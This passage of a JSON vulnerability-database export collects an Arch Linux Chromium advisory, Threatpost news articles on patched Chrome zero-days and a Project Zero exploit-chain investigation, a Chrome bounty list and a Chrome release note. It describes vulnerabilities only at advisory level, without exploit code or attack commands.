found in the chromium browser before\n72.0.3626.81 leading to Insufficient policy enforcement.\n\n- CVE-2019-5781 (content spoofing)\n\nA security issue has been found in the Omnibox implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5782 (arbitrary code execution)\n\nA security issue has been found in the V8 implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5783 (insufficient validation)\n\nAn insufficient validation of untrusted input issue has been found in\nthe DevTools component of the chromium browser before 72.0.3626.81.\n\nImpact\n======\n\nA remote attacker can spoof the URL in the address bar, bypass security\npolicies or execute arbitrary code.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/01/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=914497\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913296\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=895152\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=915469\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913970\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=912211\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=912074\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=904714\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=900552\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=914731\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913246\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=922627\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=907047\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=902427\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=805557\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=913975\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=908749\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=904265\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=90
8292\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=917668\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=904182\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=896722\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=863663\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=849421\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=918470\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=891697\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=896725\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=906043\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=895081\nhttps://security.archlinux.org/CVE-2019-5754\nhttps://security.archlinux.org/CVE-2019-5755\nhttps://security.archlinux.org/CVE-2019-5756\nhttps://security.archlinux.org/CVE-2019-5757\nhttps://security.archlinux.org/CVE-2019-5758\nhttps://security.archlinux.org/CVE-2019-5759\nhttps://security.archlinux.org/CVE-2019-5760\nhttps://security.archlinux.org/CVE-2019-5761\nhttps://security.archlinux.org/CVE-2019-5762\nhttps://security.archlinux.org/CVE-2019-5763\nhttps://security.archlinux.org/CVE-2019-5764\nhttps://security.archlinux.org/CVE-2019-5765\nhttps://security.archlinux.org/CVE-2019-5766\nhttps://security.archlinux.org/CVE-2019-5767\nhttps://security.archlinux.org/CVE-2019-5768\nhttps://security.archlinux.org/CVE-2019-5769\nhttps://security.archlinux.org/CVE-2019-5770\nhttps://security.archlinux.org/CVE-2019-5771\nhttps://security.archlinux.org/CVE-2019-5772\nhttps://security.archlinux.org/CVE-2019-5773\nhttps://security.archlinux.org/CVE-2019-5774\nhttps://security.archlinux.org/CVE-2019-5775\nhttps://security.archlinux.org/CVE-2019-5776\nhttps://security.archlinux.org/CVE-2019-5777\nhttps://security.archlinux.org/CVE-2019-5778\nhttps://security.archlinux.org/CVE-2019-5779\nhttps://security.archlinux.org/CVE-2019-5780\nhttps://security.archlinux.org/CVE-2019-5781\nhttps://security.archlinux.org/CVE-2019-5782\nhttps://security.archlinux.org/CVE-2019-
5783", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-02-11T00:00:00", "type": "archlinux", "title": "[ASA-201902-3] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5783"], "modified": "2019-02-11T00:00:00", "id": "ASA-201902-3", "href": "https://security.archlinux.org/ASA-201902-3", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-14T22:29:07", "description": "Google said Monday it has patched a Chrome web browser zero-day bug being actively exploited in the wild. 
The flaw affects versions of Chrome running on the Windows, macOS and Linux platforms.\n\nThe zero-day vulnerability, tracked as CVE-2020-6418, is a type confusion bug and has a severity rating of high. Google said the flaw impacts versions of Chrome released before version 80.0.3987.122. The bug is tied to Chrome\u2019s open-source JavaScript and Web Assembly engine, called V8.\n\nTechnical details of CVE-2020-6418 are being withheld pending patch deployment to a majority of affected versions of the Chrome browser, [according to Google](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>). Generally speaking, memory corruption vulnerabilities occur when memory is altered without explicit data assignments triggering programming errors, which enable an adversary to execute arbitrary code on targeted devices.\n\nIn the context of web browser engines, a similar memory corruption bug exploited by adversaries [earlier this month](<https://threatpost.com/mozilla-firefox-73-browser-update-fixes-high-severity-rce-bugs/152831/>), enticed victims to visit a specially-crafted web site booby-trapped with an exploit that took advantage of a browser memory corruption flaw to execute code remotely.\n\nCredited for finding the bug is Google\u2019s Threat Analysis Group and researcher Cl\u00e9ment Lecigne.\n\nGoogle is also warning users of two additional high-severity vulnerabilities. One, tracked as CVE-2020-6407, is an \u201cout of bounds memory access in streams\u201d bug. 
The other bug, which does not have a CVE assignment, is a flaw tied to an integer overflow in ICU, a flaw commonly associated with triggering a denial of service and possibly code execution.\n\nMitigation includes Windows, Linux and macOS users downloading and installing [the latest version of Chrome](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>).\n", "cvss3": {}, "published": "2020-02-25T18:34:52", "type": "threatpost", "title": "Google Patches Chrome Browser Zero-Day Bug, Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T18:34:52", "id": "THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "href": "https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-13T17:23:32", "description": "Google researchers have detailed a major hacking campaign that was detected in early 2020, which mounted a series of sophisticated attacks, some using zero-day flaws, against [Windows](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>) and [Android](<https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/>) platforms.\n\nWorking together, researchers from [Google Project Zero](<https://threatpost.com/2-zero-day-bugs-google-chrome/161160/>) and the [Google Threat Analysis Group (TAG)](<https://blog.google/threat-analysis-group/>) uncovered the attacks, which were \u201cperformed by a highly sophisticated actor,\u201d Ryan from Project Zero wrote in the [first](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>) of a six-part blog series on their research.\n\n\u201cWe discovered two exploit servers delivering different exploit chains via watering-hole attacks,\u201d he wrote. 
\u201cOne server targeted Windows users, the other targeted Android.\u201d\n\nWatering-hole attacks target organizations\u2019 oft-used websites and inject them with malware, infecting and gaining access to victims\u2019 machines when users visit the infected sites.\n\nIn the case of the attacks that Google researchers uncovered, attackers executed the malicious code remotely on both the Windows and Android servers using Chrome exploits. The exploits used against Windows included [zero-day](<https://threatpost.com/apple-patches-bugs-zero-days/161010/>) flaws, while Android users were targeted with exploit chains using known \u201cn-day\u201d exploits, though they acknowledge it\u2019s possible zero-day vulnerabilities could also have been used, researchers said.\n\nThe team spent months analyzing the attacks, including examining what happened [post-exploitation on Android devices.](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>) In that case, additional payloads were delivered that collected device fingerprinting information, location data, a list of running processes and a list of installed applications for the phone.\n\n## Zero-Day Bugs\n\nThe researchers posted [root-cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) for each of the four Windows zero-day vulnerabilities that they discovered being leveraged in their attacks.\n\nThe first, [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/cve-2020-6418-chrome-incorrect-side.html>), is a type confusion bug prior to 80.0.3987.122 leading to remote-code execution. It exists in V8 in Google Chrome (Turbofan), which is the component used for processing JavaScript code. 
It allows a remote attacker to potentially cause heap corruption via a crafted HTML page.\n\nThe second, [CVE-2020-0938](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938>), is a trivial stack-corruption vulnerability in the Windows Font Driver. It can be triggered by loading a Type 1 font that includes a specially crafted BlendDesignPositions object. In the attacks, it was chained with [CVE-2020-1020](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020>), another Windows Font Driver flaw, this time in the processing of the VToHOrigin PostScript font object, also triggered by loading a specially crafted Type 1 font. Both were used for privilege escalation.\n\n\u201cOn Windows 8.1 and earlier versions, the vulnerability was chained with [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1020>) (a write-what-where condition) to first set up a second stage payload in RWX kernel memory at a known address, and then jump to it through this bug,\u201d according to Google. \u201cThe exploitation process was straightforward because of the simplicity of the issue and high degree of control over the kernel stack. The bug was not exploited on Windows 10.\u201d\n\nAnd finally, [CVE-2020-1027](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027>) is a Windows heap buffer overflow in the Client/Server Run-Time Subsystem (CSRSS), which is an essential subsystem that must be running in Windows at all times. The issue was used as a sandbox escape in a browser exploit chain using, at times, all four vulnerabilities.\n\n\u201cThis vulnerability was used in an exploit chain together with a 0-day vulnerability in Chrome (CVE-2020-6418). 
For older OS versions, even though they were also affected, the attacker would pair CVE-2020-6418 with a different privilege escalation exploit (CVE-2020-1020 and CVE-2020-0938).\u201d\n\nAll have since been patched.\n\n## Advanced Capabilities\n\nFrom their understanding of the attacks, researchers said that threat actors were operating a \u201ccomplex targeting infrastructure,\u201d though, curiously, they didn\u2019t use it every time.\n\n\u201cIn some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox,\u201d according to researchers. \u201cIn these cases, the attacker took a slower approach: sending back dozens of parameters from the end user\u2019s device, before deciding whether or not to continue with further exploitation and use a sandbox escape.\u201d\n\nIn other cases, attackers chose to fully exploit a system straightaway, or did not attempt any exploitation at all, researchers observed. \u201cIn the time we had available before the servers were taken down, we were unable to determine what parameters determined the \u2018fast\u2019 or \u2018slow\u2019 exploitation paths,\u201d according to the post.\n\nOverall, whoever was behind the attacks designed the exploit chains to be used modularly for efficiency and flexibility, showing clear evidence that they are experts in what they do, researchers said.\n\n\u201cThey [use] well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks,\u201d according to the post.\n", "cvss3": {}, "published": "2021-01-13T16:57:39", "type": "threatpost", "title": "Sophisticated Hacks Against Android, Windows Reveal Zero-Day Trove", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "modified": "2021-01-13T16:57:39", "id": "THREATPOST:88098D30DA04E912B06C03B52556385C", "href": "https://threatpost.com/hacks-android-windows-zero-day/163007/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-21T12:26:16", "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>) which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. 
Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac and Linux, among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk.\n\n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well since Google was so quick in its response to the bug. He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! 
(restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero day, Google patched four other bugs\u2014three of high risk and one of medium risk\u2013in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "cvss3": {}, "published": "2020-10-21T12:23:29", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "modified": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent 
known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. The most troubling, tracked as CVE-2020-16009, is rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8\u201d.\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team.\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 31 are Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to affected endpoints. 
While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). 
Lastly, Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as CVE-2020-16011.\n\nThis week\u2019s Chrome updates come on the heels of a zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google affecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "cvss3": {}, "published": "2020-11-03T17:23:23", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "modified": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:36", "description": "Google on Monday released the [latest stable version of Chrome](<https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html>) that includes patches for 30 vulnerabilities, including five high severity issues.\n\nThe company paid out $23,500 to external researchers for the vulnerabilities, including $7,500 for a type confusion vulnerability in V8, the open source JavaScript engine Google uses for the browser. The fix was a relatively quick one for Google; Zhao Qixun, a researcher with Qihoo 360\u2019s Vulcan Team, discovered the vulnerability just three weeks ago.\n\nThe update also helps resolve a high severity out-of-bounds read vulnerability in V8, two high severity use-after-free vulnerabilities\u2013one in the browser\u2019s print preview feature, another in its Bluetooth app functionality\u2013and a vulnerability that could have enabled address spoofing in the browser\u2019s Omnibox address bar.\n\nAddress spoofing vulnerabilities continue to be a problem for Chrome. 
Google has fixed roughly a dozen of them in the browser since last September, including three in Monday\u2019s Chrome 59 update, three in April\u2019s Chrome 58 update \u2013 including one that could\u2019ve led to [unicode phishing attacks](<https://threatpost.com/google-fixes-unicode-phishing-vulnerability-in-chrome-58-firefox-standing-pat/125099/>), two in Chrome 57 [in March](<https://threatpost.com/google-chrome-57-browser-update-patches-high-severity-flaws/124235/>), and two in Chrome 56 [in January](<https://threatpost.com/high-severity-chrome-vulnerabilities-earn-researcher-32k-in-rewards/123363/>). Attackers traditionally used the vulnerabilities to trick users into visiting unintended sites, often ones hosting malware.\n\nThe high, medium, and low-severity bugs in Chrome that earned bounties are:\n\n * [$7500] [[722756](<https://crbug.com/722756>)] **High** CVE-2017-5070: Type confusion in V8. _Reported by Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team on 2017-05-16_\n * [$3000] [[715582](<https://crbug.com/715582>)] **High** CVE-2017-5071: Out of bounds read in V8. _Reported by Choongwoo Han on 2017-04-26_\n * [$3000] [[709417](<https://crbug.com/709417>)] **High** CVE-2017-5072: Address spoofing in Omnibox. _Reported by Rayyan Bijoora on 2017-04-07_\n * [$2000] [[716474](<https://crbug.com/716474>)] **High** CVE-2017-5073: Use after free in print preview. _Reported by Khalil Zhani on 2017-04-28_\n * [$1000] [[700040](<https://crbug.com/700040>)] **High** CVE-2017-5074: Use after free in Apps Bluetooth. _Reported by anonymous on 2017-03-09_\n * [$2000] [[678776](<https://crbug.com/678776>)] **Medium** CVE-2017-5075: Information leak in CSP reporting. _Reported by Emmanuel Gil Peyrot on 2017-01-05_\n * [$1000] [[722639](<https://crbug.com/722639>)] **Medium** CVE-2017-5086: Address spoofing in Omnibox. _Reported by Rayyan Bijoora on 2017-05-16_\n * [$1000] [[719199](<https://crbug.com/719199>)] **Medium** CVE-2017-5076: Address spoofing in Omnibox. _Reported by Samuel Erb on 2017-05-06_\n * [$1000] [[716311](<https://crbug.com/716311>)] **Medium** CVE-2017-5077: Heap buffer overflow in Skia. _Reported by Sweetchip on 2017-04-28_\n * [$1000] [[711020](<https://crbug.com/711020>)] **Medium** CVE-2017-5078: Possible command injection in mailto handling. _Reported by Jose Carlos Exposito Bueno on 2017-04-12_\n * [$500] [[713686](<https://crbug.com/713686>)] **Medium** CVE-2017-5079: UI spoofing in Blink. _Reported by Khalil Zhani on 2017-04-20_\n * [$500] [[708819](<https://crbug.com/708819>)] **Medium** CVE-2017-5080: Use after free in credit card autofill. _Reported by Khalil Zhani on 2017-04-05_\n * [$N/A] [[672008](<https://crbug.com/672008>)] **Medium** CVE-2017-5081: Extension verification bypass. _Reported by Andrey Kovalev (@L1kvID) Yandex Security Team on 2016-12-07_\n * [$N/A] [[721579](<https://crbug.com/721579>)] **Low** CVE-2017-5082: Insufficient hardening in credit card editor. _Reported by Nightwatch Cybersecurity Research on 2017-05-11_\n * [$N/A] [[714849](<https://crbug.com/714849>)] **Low** CVE-2017-5083: UI spoofing in Blink. _Reported by Khalil Zhani on 2017-04-24_\n * [$N/A] [[692378](<https://crbug.com/692378>)] **Low** CVE-2017-5085: Inappropriate javascript execution on WebUI pages. _Reported by Zhiyang Zeng of Tencent security platform department on 2017-02-15_\n\nThe update also resolves a low severity issue in Blink, the rendering engine used by Chrome, that was more than two years in the making.\n\nDaniel Veditz, a member of Mozilla\u2019s Security Team, pointed out in May 2015 that sendBeacon(), a method used to transmit data to a provided URL, allowed for the sending of POST requests with arbitrary content type.\n\n> [@sirdarckcat](<https://twitter.com/sirdarckcat>) XHR can also send any/content-type data. 
Like XHR, sendBeacon uses the CORS model.\n> \n> \u2014 Daniel Veditz (@dveditz) [May 20, 2015](<https://twitter.com/dveditz/status/600920852524244993>)\n\nIt took developers two years but a [patch for the issue](<https://bugs.chromium.org/p/chromium/issues/detail?id=490015>) was finally merged into Chrome 59 on Monday, as well as into Chrome 60, expected to be released sometime in mid-July.\n\nThe update comes with a collection of non-security tweaks as well, including the ability to push native macOS notifications, and a new Chrome Settings page.\n\nAbsent from the update is a fix for a hack that could have let attackers automatically download a malicious file to a victim\u2019s PC to steal credentials and launch SMB relay attacks. The vulnerability, [described in detail last month](<https://threatpost.com/chrome-browser-hack-opens-door-to-credential-theft/125686/>), is tied to the way both Chrome and Windows handle .SCF files. Google told Threatpost at the time it was aware of the issue and \u201ctaking the necessary actions.\u201d\n\nThe update comes a few days after Google reportedly told some of its publishers it plans to debut a new ad-blocking tool in the browser in 2018. 
The feature, which will be turned on by default according to the [_Wall Street Journal_,](<https://www.wsj.com/articles/google-will-help-publishers-prepare-for-a-chrome-ad-blocker-coming-next-year-1496344237>) will block ads from appearing on websites \u201cthat are deemed to provide a bad advertising experience for users.\u201d The company gave publishers, agencies and advertisers a six-month heads up about its plans last week to help them better prepare.\n", "cvss3": {}, "published": "2017-06-06T13:36:40", "type": "threatpost", "title": "Google Fixes 30 Vulnerabilities, Five High Severity, in Chrome 59", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2017-06-06T17:36:40", "id": "THREATPOST:0CFA20DA4CAE2D0F32CD16D0779CC426", "href": "https://threatpost.com/google-fixes-30-vulnerabilities-five-high-severity-in-chrome-59/126091/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "chrome": [{"lastseen": "2021-12-30T22:31:46", "description": "The stable channel has been updated to 80.0.3987.122 for Windows, Mac, and Linux, which will roll out over the coming days/weeks. \n\n\n\n\n\n\nA list of all changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/80.0.3987.116..80.0.3987.122?pretty=fuller&n=10000>). Interested in switching release channels? [ Find out how](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. 
\n\n\n\n\n**Security Fixes and Rewards** \n\n\n\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n** \n** \n\n\nThis update includes [3](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-3-M80>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n** \n** \n\n\n[$5000][[1044570](<https://crbug.com/1044570>)] High: Integer overflow in ICU. Reported by Andr\u00e9 Bargull (with thanks to Jeff Walden from Mozilla) on 2020-01-22\n\n[N/A][[1045931](<https://crbug.com/1045931>)] High CVE-2020-6407: Out of bounds memory access in streams. Reported by Sergei Glazunov of Google Project Zero on 2020-01-27\n\n** \n** \n\n\nThis release also contains:\n\n[N/A][[1053604](<https://crbug.com/1053604>)] High CVE-2020-6418: Type confusion in V8. 
